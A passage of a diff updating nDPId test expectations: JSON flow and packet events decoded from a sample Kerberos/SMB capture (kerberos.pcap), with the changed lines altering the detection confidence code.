vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk83f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} +00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZEFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="} -00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} +00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7580000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7580000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="} 00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="} @@ -28,12 +27,11 @@ 00736{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAAD6EzZAAIAGfdasEAgIrBAIyQGFwAlIl8v7DkIzcVAYAQBePQAAMIQAAADMAgEDYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1fPlG7bKWdrh2HD6cpz+MijBmfhDcDSHRgxosMnwcbCi1ZRnrViGBtMC2nQv6mVUDSJapX\/mZgtc4l9ALb+\/jokxskSCIt0GZfBXlBh6SOp7g9nc\/2WT4mG5e+fctttNW4KixsBWTLsk4U0TsD"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337930192,"pkt":"pB9ywglqAAgCHEeuCABFAAEXAE9AAIAGkKCsEAjJrBAICMAOAFh1zEKiBQpS4FAYAQB22wAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDkhBUFBZQ1JBRlQuT1JHoyMwIaADAgECoRowGBsGa3JidGd0Gw5IQVBQWUNSQUZULk9SR6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE6HHTSoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930192,"flow_last_seen":1549337930192,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337930192,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00825{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337930193,"pkt":"AAgCHEeupB9ywglqCABFAAE+E0ZAAIAGfYKsEAgIrBAIyQBYwA4FClLgdcxDkVAYAQCvKAAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDDGWApgMCARmpEBsOSEFQUFlDUkFGVC5PUkeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00730{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7580000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337930193,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337930214,"pkt":"pB9ywglqAAgCHEeuCABFAAFnAFNAAIAGkEysEAjJrBAICMAPAFhOqMfQDl0Bb1AYAQBFdgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4T+8E3pUi7h1ZsZOoIXjjwvAQAgQGpJXHn0jgIAIbXQei+GxBZQViNO7UVdhzj5KUys1PXrvG2C8wEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOSEFQUFlDUkFGVC5PUkejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETocdNKgVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} -00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} +00722{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337930214,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 00605{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1549337930214,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337930214,"pkt":"AAgCHEeupB9ywglqCABFAACYE0tAAIAGfiOsEAgIrBAIyQBYwA8OXQcjTqjJD1AYAQBZNwAAQBgDyB6VZPxID+fu9kcivDlP7463Dy1IfrYrHVzuJLB3P27gpkccW43Mtu3NrktwKAyme0Z0QNo0JvH3ppwCLvPborHS7i5Jp9I5pxLf5LZX6AlmVea2udQa4ufUWkijqzhrShLiqrevOUKPGzj2OQ=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337930217,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1549337930217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337930217,"pkt":"pB9ywglqAAgCHEeuCABFAADBAFlAAIAGkOysEAjJrBAICMAQAFhuA\/SQrSTVxVAYAQACWAAAqoGWMIGToAMCARKigYsEgYhFQhzXcnmj64Ly0uBtjkMUoTuM+x\/rpAOTUWDkUHAspBDcB8geScaOnqOyTgnIEt9ORSbyaLGh7aDpqWoX8LkoU9AsGNn4U6LRjikWi59PfjQn46P9BY0tn6JOEZn\/IKW+bzyhJYK72MU5dfE\/Y9v1QP4pOcMGsyTXEkOUPDq6y5KpwHUNPs1e"} @@ -50,9 +48,9 @@ 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1549337931199,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":122,"pkt_l4_len":88,"thread_ts_msec":1549337931199,"pkt":"AAgCHEeupB9ywglqCABFAABsE2VAAIAGfjWsEAgIrBAIyQBYwBJewuYoJDXRkVAYAQBPlQAA7mWAsz4LwR11oOSQ27Ex06YGG2bAP8ttVVXtAwxS755lCHRg4mUkpOjXnBJJ8KdHDkkp7LWBSVTLf+j0wkJ4hFVjx0c="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931210,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":1432,"midstream":1,"thread_ts_msec":1549337931210,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02397{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1549337931210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1486,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1486,"pkt_l4_len":1452,"thread_ts_msec":1549337931210,"pkt":"pB9ywglqAAgCHEeuCABFAAXAAHpAAIAGi8ysEAjJrBAICMATAFio5J72SB155lAYAQAvgAAAAAAFlGyCBZAwggWMoQMCAQWiAwIBDKOCBQcwggUDMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9